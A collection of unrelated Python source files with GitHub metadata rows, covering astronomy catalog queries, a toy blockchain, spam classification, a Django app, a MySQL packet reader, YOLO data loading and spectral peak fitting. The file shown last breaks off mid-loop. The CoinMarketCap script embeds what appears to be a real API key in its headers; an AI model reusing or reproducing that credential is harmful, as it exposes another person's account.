ras.astype(float),
decs.astype(float),
coo_bibcodes,
plx_values.astype(float),
plx_errs.astype(float),
plx_bibcodes,
pmras.astype(float),
pmdecs.astype(float),
pm_errs.astype(float),
pm_bibcodes,
radvels.astype(float),
rvz_errs.astype(float),
rvz_bibcodes,
ids
])
cluster_children: pd.DataFrame = pd.DataFrame(
columns=['obj_id', 'oid', 'link_bibcode', 'ra', 'dec', 'coo_bibcode',
'parallax', 'parallax_err', 'parallax_bibcode',
'pmra', 'pmdec', 'pm_err', 'pm_bibcode',
'radvel', 'radvel_err', 'rvz_bibcode', 'ids'],
data=data.T)
cluster_children = cluster_children.dropna(subset=['ra', 'dec', 'link_bibcode'])
cluster_children['EDR3 id'] = np.vectorize(fetch_catalog_id)(cluster_children.ids, 'EDR3')
cluster_children['DR2 id'] = np.vectorize(fetch_catalog_id)(cluster_children.ids, 'DR2')
cluster_children['TIC'] = np.vectorize(fetch_catalog_id)(cluster_children.ids, 'TIC')
cluster_children['EDR3 id'] = pd.to_numeric(cluster_children['EDR3 id'], errors='coerce')
cluster_children['DR2 id'] = pd.to_numeric(cluster_children['DR2 id'], errors='coerce')
cluster_children['TIC'] = pd.to_numeric(cluster_children['TIC'], errors='coerce')
cluster_children = cluster_children.dropna(subset=['EDR3 id'])
edr_unique = np.unique(cluster_children['EDR3 id'].values)
reported_counts = {x: len(np.nonzero(cluster_children['EDR3 id'].values==x)[0]) for x in edr_unique}
cluster_children['reported'] = cluster_children['EDR3 id'].apply(lambda x: reported_counts[x])
cluster_children['parallax_year'] = cluster_children['parallax_bibcode'].apply(lambda x: x[:4])
cluster_children['pm_year'] = cluster_children['pm_bibcode'].apply(lambda x: x[:4])
cluster_children['rvz_year'] = cluster_children['rvz_bibcode'].apply(lambda x: x[:4])
cluster_children = cluster_children.sort_values(by=['EDR3 id', 'parallax_year', 'pm_year', 'rvz_year'])
cluster_children = cluster_children.drop_duplicates(subset=['EDR3 id'])
return cluster_children
def title_and_authors(bibcode: str) -> str:
URL = f'https://ui.adsabs.harvard.edu/abs/{bibcode}/abstract'
website = requests.get(URL)
results = BeautifulSoup(website.content, 'html.parser')
title = ' '.join(results.find('h2', class_='s-abstract-title').text.split())
authors = [author.text.strip() for author in results.find_all('li', class_='author')]
return f'{",".join(authors)}:\n {title}'
def count_reportings(children, edr3_id):
return len(children[children['EDR3 id'].astype(int)==edr3_id])
|
maja-jablonska/blue-stragglers-with-gaia
|
simbad_download.py
|
simbad_download.py
|
py
| 5,295 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42360515633
|
## Using python3
## https://open.kattis.com/problems/apaxiaaans
name = input()
last = ''
c = ''
for i in range(len(name)):
c = name[i]
if (c != last):
print(c, end = '')
last = c
print()
|
Resethel/Kattis
|
Problems/apaxiaaans/Python3/apaxiaaans.py
|
apaxiaaans.py
|
py
| 214 |
python
|
en
|
code
| 1 |
github-code
|
6
|
33276100451
|
# coding: utf-8
# In[2]:
import hashlib
import json
from datetime import datetime
class Block:
def calculateHash(self):
return hashlib.sha256((self.timestamp+str(self.transaction)+self.previoushash+str(self.nonce))
.encode('utf-8')).hexdigest()
# return hashlib.sha256(("abc").encode('utf-8')).hexdigest()
def __init__(self, timestamp, transaction, previoushash=''):
print("Constructing a new block")
self.timestamp = timestamp
self.transaction = transaction
self.previoushash = previoushash
self.nonce = 0
self.hash = self.calculateHash()
#Proof of Work logic
def mineBlock(self, newBlock, difficulty):
#print(f"SubString {newBlock.hash[0:difficulty]}")
while(str(newBlock.hash)[0:difficulty] != "0"*difficulty):
newBlock.nonce += 1
#print(f"New Hash {newBlock.calculateHash()}")
newBlock.hash = newBlock.calculateHash()
return newBlock
def __str__(self):
return "Timestamp: "+self.timestamp+" transaction: "+self.transaction+" Hash: "+self.hash
class BlockChain:
def createGenesisBlock(self):
initialTransactions=[Transaction("demo","XYZ", 0)]
return Block("09-08-2018", initialTransactions)
def __init__(self):
self.chain = [self.createGenesisBlock()]
self.difficulty = 2
self.pendingTransaction=[]
self.reward=100
def minePendingTransactions(self,miningRewardAddress):
newBlock=Block(str(datetime.now()),self.pendingTransaction)
newBlock=newBlock.mineBlock(newBlock,self.difficulty)
newBlock.previoushash=self.getLatestBlock().hash
print("Block successfully mined!!")
self.chain.append(newBlock)
self.pendingTransaction=[
Transaction("System",miningRewardAddress,self.reward)
]
def getLatestBlock(self):
return self.chain[len(self.chain)-1]
def createTransaction(self,transaction):
self.pendingTransaction.append(transaction)
def checkBalanceOfAddress(self,address):
balance=0
for block in self.chain:
for tran in block.transaction:
if(tran.fromAddress==address):
balance-=tran.amount
elif(tran.toAddress==address):
balance+=tran.amount
return balance
def validateBlockChain(self):
i = 1
while(i < len(self.chain)):
currblock = self.chain[i]
prevBlock = self.chain[i-1]
if(not currblock.hash == currblock.calculateHash()):
return False
if(not currblock.previoushash == prevBlock.hash):
return False
i += 1
return True
class Transaction:
def __init__(self,fromAddress,toAddress,amount):
self.fromAddress=fromAddress
self.toAddress=toAddress
self.amount=amount
def __str__(self):
#return "From: "+self.fromAddress+" To: "+self.toAddress+" Amount: "+self.amount
return self.__dict__
def obj_to_dict(obj):
return obj.__dict__
blockChain = BlockChain()
blockChain.createTransaction(Transaction("ckp","abc",10))
blockChain.createTransaction(Transaction("abc","ckp",100))
print(json.dumps(blockChain.chain, default=obj_to_dict))
print("Starting miner!!")
blockChain.minePendingTransactions("ThePrime")
print(json.dumps(blockChain.chain, default=obj_to_dict))
print(f"Balance of abc {blockChain.checkBalanceOfAddress('abc')}")
print(f"Balance of ckp {blockChain.checkBalanceOfAddress('ckp')}")
print(f"Balance of ThePrime {blockChain.checkBalanceOfAddress('ThePrime')}")
print("Starting miner!!")
blockChain.minePendingTransactions("ThePrime")
print(f"Balance of ThePrime {blockChain.checkBalanceOfAddress('ThePrime')}")
|
cpandya231/Blockchain_Poc
|
Blockchain_poc_with miner and transactions.py
|
Blockchain_poc_with miner and transactions.py
|
py
| 3,935 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37233125461
|
from naive_bayes import naive_bayes_run
from naive_bayes import calc_prob
from create_voc_functions import create_vocabulary
from vector_functions import create_vectors
from results import plot_results
import pickle
#for train
path1 = pickle.load( open( "examples_edit\\training_path.p", "rb" ) )
typ1 = pickle.load( open( "examples_edit\\training_types.p", "rb" ) )
#for dev
path2 = pickle.load( open( "examples_edit\\dev_path.p", "rb" ) )
typ2 = pickle.load( open( "examples_edit\\dev_types.p", "rb" ) )
#for test
path3 = pickle.load( open( "examples_edit\\test_path.p", "rb" ) )
typ3 = pickle.load( open( "examples_edit\\test_types.p", "rb" ) )
max_acc = 0
max_m = 0
ms = [500,1000,1500]
#vres max sundiasmo uperparametrwn
for m in ms:
Xs,voc_index,sum_mes,sum_ham_mes = create_vocabulary(m,True,10)
path_train, vec_emails_train, typ_train = create_vectors(path1,typ1,voc_index)
path_dev, vec_emails_dev, typ_dev = create_vectors(path2,typ2,voc_index)
probs = calc_prob(Xs,sum_mes,sum_ham_mes)#dhmiourgia pithanothtwn
prob_ham = sum_ham_mes/sum_mes
res1 = naive_bayes_run(vec_emails_dev,typ_dev,probs,prob_ham,voc_index)
acc = (res1[0][0]+res1[1][1])/(res1[0][0]+res1[0][1]+res1[1][0]+res1[1][1])
if acc>max_acc:
max_acc = acc
max_m = m
print("Max uperparametros m: ",max_m)
#apotelesmata sta test dedomena
x=[]
resTests = []
resTrains = []
print("Predict...")
for i in range(10):
Xs, voc_index,sum_mes,sum_ham_mes = create_vocabulary(max_m,True,i+1)#dhmiourgia vocabulary me vash to kalutero m
#create vectors
path_train, vec_emails_train, typ_train = create_vectors(path1,typ1,voc_index)
path_testm, vec_emails_test, typ_test = create_vectors(path3,typ3,voc_index)
x.append(sum_mes)
probs = calc_prob(Xs,sum_mes,sum_ham_mes)#dhmiourgia pithanothtwn
prob_ham = sum_ham_mes/sum_mes
resTest = naive_bayes_run(vec_emails_test,typ_test,probs,prob_ham,voc_index)
resTrain = naive_bayes_run(vec_emails_train[0:sum_mes],typ_train[0:sum_mes],probs,prob_ham,voc_index)
resTests.append(resTest)
resTrains.append(resTrain)
plot_results("test","naive",x,resTests,resTrains)
|
ntinouldinho/Artificial-Intelligence-SpamHam-Classifier
|
naive_bayes_main.py
|
naive_bayes_main.py
|
py
| 2,271 |
python
|
en
|
code
| 1 |
github-code
|
6
|
35227184392
|
import glob
import os
import shutil
from tqdm import tqdm
from sklearn.model_selection import train_test_split
import multiprocessing as mp
from functools import partial
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i : i + n]
def loop(images, source_dir, target_dir):
for image in tqdm(images):
#source = f"{source_dir}{image}"
#target = f"{target_dir}{image}"
shutil.copy(os.path.join(source_dir, "input", image), os.path.join(target_dir, "lr", image))
shutil.copy(os.path.join(source_dir, "target", image), os.path.join(target_dir, "hr", image))
if __name__ == "__main__":
train_names = glob.glob("train_data/input/*.png")
train_names = [f.replace("train_data/input/", "") for f in train_names]
tr, val = train_test_split(train_names, test_size=0.1, random_state=42)
print(train_names)
assert len(tr) + len(val) == len(train_names)
assert all([text not in tr for text in val])
#os.makedirs("val_data_srgan", exist_ok=True)
#os.makedirs("val_data_srgan/lr", exist_ok=True)
#os.makedirs("val_data_srgan/hr", exist_ok=True)
os.makedirs("dataset_srgan3", exist_ok=True)
os.makedirs("dataset_srgan3/train", exist_ok=True)
os.makedirs("dataset_srgan3/train/lr", exist_ok=True)
os.makedirs("dataset_srgan3/train/hr", exist_ok=True)
os.makedirs("dataset_srgan3/test", exist_ok=True)
os.makedirs("dataset_srgan3/test/lr", exist_ok=True)
os.makedirs("dataset_srgan3/test/hr", exist_ok=True)
cpus = mp.cpu_count()
val_chunks = list(chunks(val, len(val) // cpus))
train_chunks = list(chunks(tr, len(tr) // cpus))
pool = mp.Pool(cpus)
pool.map(partial(loop, source_dir="train_data", target_dir="dataset_srgan3/train"), train_chunks)
pool.map(partial(loop, source_dir="train_data", target_dir="dataset_srgan3/test"), val_chunks)
#for name in tqdm(val, desc="Saving val data..."):
# shutil.move(, f"val_data_srgan/lr/{name}")
# shutil.move(f"dataset_srgan/hr/{name}", f"val_data_srgan/hr/{name}")
|
avacaondata/SpainAI_Hackaton_ComputerVision
|
split_data_multiprocessing.py
|
split_data_multiprocessing.py
|
py
| 2,114 |
python
|
en
|
code
| 1 |
github-code
|
6
|
41460148421
|
#Python script to retrieve Top 10 performing Cryptocurrencies, ranked by Market capitalization
#Import relevant modules to query API
import requests, json
#Define variables used to query API
url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest'
headers = {
'Accept': 'application/json',
'Accept-Encoding': 'deflate, gzip',
'X-CMC_PRO_API_KEY': '4831410c-b174-4908-819a-bb923176a2d7',
}
qs = {'start':'1','limit':'10','convert':'USD'}
#Definte preogram variables
counter = 0
topNum = range(0,10)
table_title = " TOP 10 PERFORMING CRYPTOCURRENCIES -Ranked: Market capitalization-"
table_header = ['#', 'Name', 'Market Cap ($)', 'Price ($)', 'Volume-24h ($)', 'Change-24h (%)', 'Circulating Supply']
data_keys = ['cmc_rank', 'name', 'quote', 'circulating_supply']
quote_keys = ['market_cap', 'price', 'volume_24h','percent_change_24h']
#Request data from CoinMarketCap API using GET function
cmc_data = requests.get(url, headers=headers, params=qs)
if cmc_data.status_code == 200: #Check if status is ok
response = cmc_data.json() #use built-in json decoder to get json response content
data = response['data']
if all(k in data[0] for k in data_keys): #Check if all 2nd level keys exist
if all(k in data[0]['quote']['USD'] for k in quote_keys): #Check if all 3rd level keys exist
print('All requested keys exist\n\n')
print("{:^150}".format(table_title))
print('='*150)
for i in table_header:
print("{:<20s}".format(i),end='')
print('\n')
print('='*150)
#Print # cryptocurrencies defined in topNum
for x in topNum:
for y in data_keys:
if y == 'quote':
for z in quote_keys:
print("{:<20.2f}".format(data[x][y]['USD'][z]), end='')
elif y == 'circulating_supply':
symbol = data[x]['symbol']
print("{:>.2f}".format(data[x][y]), symbol, end='')
else:
print("{:<20}".format(data[x][y]), end='')
print('\n')
else:
print('ERROR - check "qoute" keys')
else:
print('ERROR - check "data" keys')
else :
print('ERROR: Check status code: ',cmc_data.status_code)
|
lilokotze/CMC_assignment
|
CMC_assignment.py
|
CMC_assignment.py
|
py
| 2,542 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27566260651
|
from django.shortcuts import render, HttpResponseRedirect
from .forms import MeetingCreateForm
from .models import Meeting
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from django.contrib import messages
from datetime import datetime, timezone as tz
from django.utils import timezone
def home(request):
form = MeetingCreateForm()
if request.method == 'POST':
form = MeetingCreateForm(request.POST)
if form.is_valid():
fm = form.save(commit=False)
# since in our form, we do not want to be selecting users,
# we have to set the creator as the current user.
fm.creator = request.user
fm.save()
return HttpResponseRedirect(reverse('meeting_list'))
return render(request, 'onlinemeet/home.html', {'form': form})
@login_required() # to ensure only logged in user can view this page.
def meeting_list(request):
"""We are going to filter the meeting, so only the registered user can view
the page, and then all meeting created by such individual will be displayed"""
user = request.user
# meeting_url = request.build_absolute_uri()
meetings = Meeting.objects.filter(creator=user)
return render(request, 'onlinemeet/meeting_list.html', {'meetings': meetings})
def meeting(request, unique_meeting_name):
message = None
meeting = Meeting.objects.get(unique_meeting_name=unique_meeting_name)
if not meeting.meeting_time:
"""
will check if it is not time for the meeting using the property we declared in the model.
"""
now = timezone.localtime()
t = abs(now - meeting.starting_date_time).total_seconds()
MinutesGet, SecondsGet = divmod(t, 60)
HoursGet, MinutesGet = divmod(MinutesGet, 60)
message = f"it is not the time for meeting {meeting.title_of_meeting}, Meeting starts in {HoursGet} Hours : {MinutesGet} Minutes : {'{:.2f}'.format(SecondsGet)} Seconds."
# return render(request, 'onlinemeet/meeting_list.html', {'meetings': meetings})
print(now, message)
messages.warning(request, message)
# return render(request, 'onlinemeet/meeting_list.html', {'meetings': meetings})
return HttpResponseRedirect(reverse('home'))
elif meeting.after_meeting:
""" will check if the meeting time has passed"""
now = timezone.localtime()
t = abs(meeting.ending_date_time - now).total_seconds()
MinutesGet, SecondsGet = divmod(t, 60)
HoursGet, MinutesGet = divmod(MinutesGet, 60)
message = f"The meeting {meeting.title_of_meeting}, ended {HoursGet} Hours : {MinutesGet} Minutes : {'{:.2f}'.format(SecondsGet)} Seconds."
print(now, message)
messages.warning(request, message)
return HttpResponseRedirect(reverse('home'))
if not request.user == meeting.creator:
"""check to know if the current user is the creator of the meeting
if True, then the person will be redirected to a page that has moderator privileges, else, redirect the guest to the guest page."""
return render(request, 'onlinemeet/guest.html', {'meeting': meeting,
"message": message})
return render(request, 'onlinemeet/meeting_page.html', {'meeting': meeting})
|
Afeez1131/Django-online-meeting
|
onlinemeet/views.py
|
views.py
|
py
| 3,327 |
python
|
en
|
code
| 2 |
github-code
|
6
|
30595009770
|
from random import randint
count = 1;
print('''Sou seu computador...
Acabei de pensar em um Nº entre 0 e 10.
Será que você consegue adivinhar qual foi?''')
n = randint(0, 10)
#print(n)
tenta = int(input('Qual o seu palpite? '))
while tenta != n:
count += 1
if tenta < n:
print('Mais... Tente mais uma vez.')
tenta = int(input('Qual é seu palpite? '))
elif tenta > n:
print('Menos... Tente mais uma vez.')
tenta = int(input('Qual é seu palpite? '))
print('Acertou com {} tentativas. Parabéns!'.format(count))
|
ErickFernan/Estudos-de-Pyhton
|
Estudo Python/Estruturas de Repetição/Estrutura repetição WHILE/ex058.py
|
ex058.py
|
py
| 559 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
42831472759
|
from django.urls import path
from . import views
urlpatterns = [
path('',views.home,name='home'),
path('<slug:c_slug>/',views.home,name='c_slug'),
path('search',views.search_box,name='search'),
path('<slug:c_slug>/<slug:p_slug>/',views.details,name='details')
]
|
muhammediyas786/Shopping-cart
|
ShopApp/urls.py
|
urls.py
|
py
| 279 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6542821272
|
from student import Student
from db import StudentRepository
import csv
class Gradebook:
def __init__(self) -> None:
self.__db = StudentRepository()
self.__students: list[Student] = self.__db.getStudents()
@property
def students(self) -> list[Student]:
return self.__students
def addStudent(self, studentID: int, firstName: str, lastName:str):
for student in self.__students:
if student.studentID == studentID:
raise KeyError("Duplicate Student ID")
policies = self.readPolicies()
numAssignments = policies[0] + policies[2] + policies[4]
student = Student(studentID, firstName, lastName, [0] * numAssignments)
print(student)
self.__students.append(student)
self.saveStudents()
def saveStudents(self):
self.__db.saveStudents(self.__students)
def recordScores(self, type: str):
policies = self.readPolicies()
def findStudent(assignmentNumber: int):
for student in self.__students:
print("Student ID: " + str(student.studentID) + ", Student Name: " + student.firstName + " " + student.lastName)
score = float(input("Input Score: "))
student.addscore(score, assignmentNumber)
self.saveStudents()
if type == 'P':
number = int(input("Assignment number:"))
if number > policies[0]:
raise ValueError("Invalid Assignment Number")
findStudent(number - 1)
elif type == 'T':
number = int(input("Test number: "))
if number > policies[2]:
raise ValueError("Invalid Test Number")
findStudent(number + policies[0] - 1)
elif type == 'F':
findStudent(policies[0] + policies[2] + policies[4] - 1)
def changeScores(self):
policies = self.readPolicies()
studentID = int(input("Student ID: "))
newScore = float(input("New Score: "))
type = input("Type of Scores (P/T/F): ")
for student in self.__students:
if student.studentID == studentID:
if type == 'P':
number = int(input("Assignment number to change: "))
student.addscore(newScore, number - 1)
elif type == 'T':
number = int(input("Test number to change: "))
student.addscore(newScore, policies[0] + number - 1)
elif type == 'F':
student.addscore(newScore, policies[0] + policies[2] + policies[4] - 1)
else:
raise ValueError("Invalid input.")
self.saveStudents()
return
raise KeyError("Student not found!")
def finalScores(self):
policies = self.readPolicies()
numOfAssignment = policies[0]
numOfTest = policies[2]
numOfExam = policies[4]
for student in self.__students:
assignmentScore = 0
testScore = 0
examScore = 0
for x in range(numOfAssignment):
assignmentScore = assignmentScore + float(student.scores[x])
assignmentScore = assignmentScore * (policies[1] / 100) / numOfAssignment
for x in range(numOfTest):
testScore += float(student.scores[x + numOfAssignment])
testScore = testScore * (policies[3] / 100) / numOfTest
for x in range(numOfExam):
examScore = float(student.scores[x + numOfAssignment + numOfTest]) * (policies[5] / 100)
finalScore = assignmentScore + testScore + examScore
student.finalScore = finalScore
self.saveStudents()
def readPolicies(self) -> list[int]:
policies = []
with open('policies.csv', 'r', newline = "") as file:
policiesInfo = file.readlines()[1]
policiesArray = policiesInfo.split(",")
for policy in policiesArray:
policies.append(int(policy))
return policies
def savePolicies(self, info: list[str]):
header = ['Programming Assignment', 'Weight', 'Tests', 'Weight', 'Final Exam', 'Weight']
with open('policies.csv', 'w', newline = "") as file:
writer = csv.writer(file)
writer.writerow(header)
writer.writerow(info)
def newSemester(self):
info: list[str] = []
programAssign = int(input("Please enter number of programming assignments (0-6): "))
pWeight = int(input("Total % weights for programming assignments: "))
print("Each programming assignment weight is (%): ", float(pWeight / programAssign))
tests = int(input("Please enter number of tests (0-4): "))
tWeight = int(input("Total % weights for tests: "))
print("Each test weight is (%): ", float(tWeight / tests))
finalExams = int(input("Please enter number of final exams (0-1): "))
info.append(programAssign)
info.append(pWeight)
info.append(tests)
info.append(tWeight)
info.append(finalExams)
if finalExams == 0:
if pWeight + tWeight != 100:
raise ValueError("Relative Weights must add up to 100%")
if finalExams == 1:
fWeight = int(input("Total % weights for final exam: "))
if pWeight + tWeight + fWeight != 100:
raise ValueError("Relative Weights must add up to 100%")
info.append(fWeight)
self.savePolicies(info)
def outputData(self, method:str):
policies = self.readPolicies()
def lastName(student:Student) -> str:
return student.lastName
def id(student:Student) -> int:
return student.studentID
if method == 'Name':
studentsInfo = sorted(self.__students, key=lastName)
elif method == 'ID':
studentsInfo = sorted(self.__students, key=id)
# print(studentsInfo[0])
header0 = ['PA = Programming Assignment']
header1 = ['Student ID', 'First Name', 'Last Name']
for x in range(policies[0]):
header1.append('PA' + str(x + 1))
for x in range(policies[2]):
header1.append('Test' + str(x + 1))
for x in range(policies[4]):
header1.append('Final Exam')
header1.append('Final Score')
with open('Grades_out.csv', 'w', newline = "") as file:
writer = csv.writer(file)
writer.writerow(header0)
writer.writerow(header1)
for student in studentsInfo:
writer.writerow(student.getStudentInfo())
def main():
gb_b = Gradebook()
# policies = gb_b.readPolicies('FA22')
# print(policies)
policies = gb_b.readPolicies()
print(policies)
gb_b.outputData('Name')
if __name__ == "__main__":
main()
|
kathyshe/gradebook-practice
|
gradebook.py
|
gradebook.py
|
py
| 6,949 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3668865617
|
from typing import List
class Solution:
def solve(self, board: List[List[str]]) -> None:
"""
Do not return anything, modify board in-place instead.
"""
def dfs(i,j,m,n):
if not (0 <= i < m and 0 <= j < n) or board[i][j] != 'O':
return
board[i][j] = 'Y'
dfs(i-1,j,m,n)
dfs(i+1,j,m,n)
dfs(i,j-1,m,n)
dfs(i,j+1,m,n)
def map_board(x):
if x == 'Y':
return 'O'
else:
return 'X'
m,n = len(board), len(board[0])
# horizonal boarders
for col in range(n):
if board[0][col] == 'O':
dfs(0,col,m,n)
if board[m-1][col] == 'O':
dfs(m-1,col,m,n)
# vertical boarders
for row in range(m):
if board[row][0] == 'O':
dfs(row,0,m,n)
if board[row][n-1] == 'O':
dfs(row,n-1,m,n)
for row in range(m):
board[row] = list(map(lambda x: map_board(x), board[row]))
|
yingzixu15/leetcode
|
src/SurroundedRegions.py
|
SurroundedRegions.py
|
py
| 1,142 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10353230480
|
import struct
class ByteStream(object):
"""A seekable byte stream
Expects a data object that provides integer values, such as a
py3 byearray or array('B')
"""
def __init__(self, data):
self.index = 0
self.data = data
def read(self, n_bytes=None):
"""Read the requested number of bytes from this packet chain"""
index = self.index
if n_bytes is None:
return self.data[index:]
result = self.data[index:index + n_bytes]
result[n_bytes-1]
self.index += n_bytes
return result
def read_int8(self):
"""Read a 8-bit/one-byte integer from packet"""
result = self.data[self.index]
self.index += 1
return result
def read_int16(self):
"""Read a 16-bit/two-byte integer from packet"""
index = self.index
self.data[index+1] # index error check
self.index += 2
return struct.unpack('<H', self.data[index:index+2])[0]
def read_int24(self):
"""Read a 24-bit/3-byte integer from packet"""
index = self.index
result = self.data[index:index+3]
result[2] # length check
result.append(0)
self.index += 3
return struct.unpack('<I', result)[0]
def read_int32(self):
"""Read a 32-bit/3 byte integer from packet"""
index = self.index
result = self.data[index:index+4]
result[3] # length check
self.index += 4
return struct.unpack('<I', result)[0]
def read_int64(self):
"""Read a 64-bit/8 byte integer from packet"""
index = self.index
result = self.data[index:index+8]
result[7] # length check
self.index += 8
return struct.unpack('<Q', result)[0]
def skip(self, n_bytes):
"""Skip the requested number of bytes in packet"""
self.index += n_bytes
def read_lcb(self):
"""Read length code binary from this packet"""
data = self.data
index = self.index
first = data[index]
if first == 251: # NULL
self.index += 1
return None
if first < 251:
self.index += 1
return first
size = first - 250
if size < 4:
i_bytes = data[index+1:index+size+1]
i_bytes[size-1] # length check
# pad buffer to 4 bytes for struct.unpack
i_bytes.extend([0]*(4 - size))
# consume first byte + size bytes (either 2 or 3)
self.index += size + 1
return struct.unpack('<I', i_bytes)[0]
else:
# size > 250, but not null and not a 2 or 3 byte int
# must be 64-bit integer
i_bytes = data[index+1:index+8+1]
i_bytes[7] # length check
self.index += 8 + 1
return struct.unpack('<Q', i_bytes)
def read_lcs(self):
"""Read a length coded binary from packet"""
data = self.data
first = data[self.index]
self.index += 1
if first < 251:
size = first
elif first == 0xfb: # NULL
return None
elif first == 252:
size = self.read_int16()
elif first == 253:
size = self.read_int24()
elif first == 254:
size = self.read_int64()
if size:
return self.read(size).tostring()
# we try to be atomic here, largely for the compressed protocol
# XXX: pretty this up
def read_n_lcs(self, n_fields):
data = self.data
index = self.index
results = []
append = results.append
while n_fields:
first = data[index]
if first == 251: # NULL
index += 1
n_fields -= 1
append(None)
continue
if first < 251:
index += 1
size = first
else:
size = first - 250
if size < 4:
i_bytes = data[index+1:index+size+1]
i_bytes[size-1] # length check
# pad buffer to 4 bytes for struct.unpack
i_bytes.extend([0]*(4 - size))
# consume first byte + size bytes (either 2 or 3)
index += size + 1
size = struct.unpack('<I', i_bytes)[0]
else:
# size > 250, but not null and not a 2 or 3 byte int
# must be 64-bit integer
i_bytes = data[index+1:index+8+1]
i_bytes[7] # length check
index += 8 + 1
size = struct.unpack('<Q', i_bytes)
data[index+size - 1]
index += size
append(data[index-size:index].tostring())
n_fields -= 1
self.index = index
return results
def read_nullstr(self):
"""Read a null terminated string from this packet"""
data = self.data
index = self.index
self.index = data.index(0x00) + 1
return self.data[index:self.index - 1].tostring()
|
abg/mysql4py
|
mysql4py/util.py
|
util.py
|
py
| 5,174 |
python
|
en
|
code
| 1 |
github-code
|
6
|
32988415640
|
import numpy as np
from utils.DataProcess import RandomHSV, RandomBlur, RandomResize, RandomFlip, RandomRotate, ResizeOrCropToInputSize, BoxToTensor
import os
import random
import tensorflow as tf
class ImageData():
def __init__(self, input_shape, class_ls, anchor_ls, anchor_mask, reduce_ratio,
hsv_delta, q_delta, resize_scale_range, flip_mode, angle_range, resize_method = "lanczos3", random = True, test_acc_mode = False):
self.random = random
self.test_acc_mode = test_acc_mode
self.random_hsv = RandomHSV(hsv_delta)
self.random_blur = RandomBlur(q_delta)
self.random_resize = RandomResize(resize_scale_range, resize_method)
self.random_flip = RandomFlip(flip_mode)
self.random_rotate = RandomRotate(angle_range)
self.img_box_to_inputsize = ResizeOrCropToInputSize(input_shape, resize_method, random)
self.box_to_tensor = BoxToTensor(input_shape, class_ls, anchor_ls, anchor_mask, reduce_ratio)
def TF_DataPreprocess(self, img, boxes):
if self.random:
img = self.random_hsv(img)
img = self.random_blur(img)
img, boxes = self.random_resize(img, boxes)
img, boxes = self.random_flip(img, boxes)
img, boxes = self.random_rotate(img, boxes)
img, boxes = self.img_box_to_inputsize(img, boxes)
img = tf.dtypes.cast(img, tf.float32)
# img = tf.clip_by_value(img, 0., 255.)
if self.test_acc_mode:
return img / 255., boxes
else:
y_true_0, y_true_1, y_true_2 = self.box_to_tensor(boxes)
return img / 255., (y_true_0, y_true_1, y_true_2) #boxes[:1,...]
def TF_Parser(self, record):
'''
TFRecordDataset 的解析器
'''
img_features = tf.io.parse_single_example(
record,
features = {
'height' : tf.io.FixedLenFeature([], tf.int64),
'width' : tf.io.FixedLenFeature([], tf.int64),
'depth' : tf.io.FixedLenFeature([], tf.int64),
'image_raw' : tf.io.FixedLenFeature([], tf.string),
'boxes_height': tf.io.FixedLenFeature([], tf.int64),
'boxes_weight': tf.io.FixedLenFeature([], tf.int64),
'boxes' : tf.io.VarLenFeature(tf.float32)
}
)
is_jpg = tf.io.is_jpeg(img_features['image_raw'])
image = tf.cond(
is_jpg,
lambda: tf.io.decode_jpeg(img_features['image_raw']),
lambda: tf.io.decode_png(img_features['image_raw'])
)
boxes = tf.sparse.to_dense(img_features['boxes'])
boxes = tf.reshape(boxes, [img_features['boxes_height'], img_features['boxes_weight']])
return image, boxes
def CreateDataset(self, tfrecord_file, batch_size, epochs = 1, shuffle_size = None, train = True, num_parallel_reads = None, num_parallel_calls = None):
# 讀取 TFRecord
self.dataset = tf.data.TFRecordDataset(tfrecord_file, num_parallel_reads)
# 解析 TFRecord
self.dataset = self.dataset.map(self.TF_Parser) #.cache()
# 資料前處理流程
self.dataset = self.dataset.map(self.TF_DataPreprocess, num_parallel_calls = num_parallel_calls)
# 定義 epochs shuffle_size batch_size
if train:
self.dataset = self.dataset.shuffle(buffer_size=shuffle_size)
self.dataset = self.dataset.batch(batch_size)
#self.dataset = self.dataset.prefetch(buffer_size = batch_size * 1)
if epochs > 1:
self.dataset = self.dataset.repeat(epochs)
|
bardenthenry/YoloV3_TF2_Keras
|
utils/ReadDataFromTFRecord.py
|
ReadDataFromTFRecord.py
|
py
| 3,841 |
python
|
en
|
code
| 1 |
github-code
|
6
|
25278816523
|
from django.urls import path,re_path
from . import views
urlpatterns = [
path('',views.dummy),
re_path('new_reg/',views.register,name='register'),
re_path('login/',views.login,name='login'),
path('index',views.index,name='index'),
path('about',views.about, name='about'),
path('contact',views.contact, name='contact'),
path('connect',views.connect, name='connect')
]
|
mukhilvinod/E-cart
|
django_tutorial/products/urls.py
|
urls.py
|
py
| 408 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9773008235
|
import os
import threading
import numpy as np
from scipy.optimize import curve_fit
import matplotlib.pyplot as plt
import pandas as pd
results = {}
sigmas = {}
def gaussian(x, mu, sigma, A):
return A * np.exp(-(x-mu)**2 / (2*sigma**2))
def find_peak(file_path, noise_range, plot=False):
try:
distribution = np.loadtxt(file_path)
x_axis = np.linspace(4383.3411648850003, 7733.3411648850003, 136)
x = np.arange(len(distribution))
noise_mask = (distribution >= noise_range[0]) & (distribution <= noise_range[1])
distribution[noise_mask] = 0
peak = np.argmax(distribution)
mu, sigma = peak, len(distribution) // 10
A = np.max(distribution)
params, _ = curve_fit(gaussian, x, distribution, p0=[mu, sigma, A])
area = np.sum(gaussian(x, *params))
if plot:
plt.plot(x_axis, distribution, 'bo', label='Original Distribution')
plt.plot(x_axis, gaussian(x, *params), 'r', label='Fitted Gaussian')
plt.xlabel('Velocity (Km/s)')
plt.ylabel('Flux (K)')
plt.legend()
plt.show()
# print("mu: ", params[0])
# print("sigma: ", params[1])
# print("A: ", params[2], 'K')
# print("Integrated Flux: ", area, 'K Km/s')
results[file_path] = area
sigmas[file_path] = params[1]
return params[0]
except:
pass
folder_path = 'C:/Users/mathe/OneDrive/Documents/PROJECTUGC2885-2022/CO files-20221207T192945Z-001/CO files/spectra10'
files = [f for f in os.listdir(folder_path) if f.endswith('.txt')]
valid_files = []
for file in files:
file_path = os.path.join(folder_path, file)
try:
data = np.loadtxt(file_path)
